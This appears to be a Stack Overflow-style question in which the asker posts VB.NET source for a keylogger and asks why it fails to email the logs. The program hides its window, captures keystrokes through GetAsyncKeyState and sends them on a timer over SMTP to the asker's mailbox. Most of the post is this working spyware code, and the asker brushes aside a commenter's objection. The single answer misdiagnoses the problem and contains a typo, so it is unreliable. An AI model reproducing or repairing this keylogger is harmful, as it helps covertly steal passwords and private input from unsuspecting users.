# SMTP Malfunction

Tags: .net, vb.net, smtp, smtpclient

today I am having a problem with my program. So basically, what it should be doing is collecting the users keystrokes and sending it to my email. My email and password have been covered for security purposes.

**CODE**

```
Option Strict On
Imports System.Net.Mail
Public Class Form1

Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vkey As Long) As Integer
Private Sub tmrEmail_Tick(sender As Object, e As EventArgs) Handles tmrEmail.Tick
    Try
        Dim smtpserver As New SmtpClient
        smtpserver.EnableSsl = True
        Dim mail As New MailMessage
        smtpserver.Credentials = New Net.NetworkCredential("a******@live.com.au", "*********")
        smtpserver.Port = 587
        smtpserver.Host = "smtp.live.com"
        mail = New MailMessage
        mail.From = New MailAddress("a******@live.com.au")
        mail.To.Add("a******@live.com.au")
        mail.Subject = ("New keylogger logs!")
        mail.Body = txtLogs.Text
        smtpserver.Send(mail)
    Catch ex As Exception
        Me.Close()
    End Try
End Sub

Private Sub tmrKeys_Tick(sender As Object, e As EventArgs) Handles tmrKeys.Tick
    Dim result As Integer
    Dim key As String = ""
    Dim i As Integer

    For i = 2 To 90
        result = 0
        result = GetAsyncKeyState(i)
        If result = -32767 Then
            key = Chr(i)
            If i = 13 Then key = vbNewLine
            Exit For
        End If
    Next i

    If key <> Nothing Then
        If My.Computer.Keyboard.ShiftKeyDown OrElse My.Computer.Keyboard.CapsLock Then
            txtLogs.Text &= key
        Else
            txtLogs.Text &= key.ToLower
        End If
    End If

    If My.Computer.Keyboard.AltKeyDown AndAlso My.Computer.Keyboard.CtrlKeyDown AndAlso key = "h" Then
        Me.Visible = True
    End If
End Sub

Private Sub Form1_FormClosed(sender As Object, e As FormClosedEventArgs) Handles Me.FormClosed
    txtLogs.Text &= vbNewLine & "Keylogger stopped at:    " & Now & vbNewLine
End Sub

Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
    Me.ShowInTaskbar = False
    Me.ShowIcon = False
    Me.Visible = False
    txtLogs.Text = txtLogs.Text + "keylogger started at: " & Now & vbNewLine


End Sub
End Class
```

Instead of sending the logs in the email it just sends

> Keylogs recived at...

I am using the .Net framework 3.5 as intended for my program.

What could the problem be?

Comment: Aside: *"My email and password have been covered for security purposes"* -- Actually you should as well **not** be keylogging users for security purposes.

Comment: @Abhitalks Actually the policy is "As long as the question expands knowledge" it is suitable. Also, what I am using it for is irrelevant.

Comment: I agree with @Abhitalks but besides this, did you try to debug and see whats going on?

Comment: @Ahmedilyas Yes, nothing I am reviving from debugging is abnormal, all is running smoothly.

Answer (score 0):

1st let me state your problem in the code pasted above you're trying to send a "file" as the body, this is not how you send attachments Example below.

```
Dim SMTP_Attachment as system.net.mail.attachment
SMTP_Attachment = new system.net.mail.attachment("Path to file")
smtpserver.attahcment.add(SMTP_Attachment)
```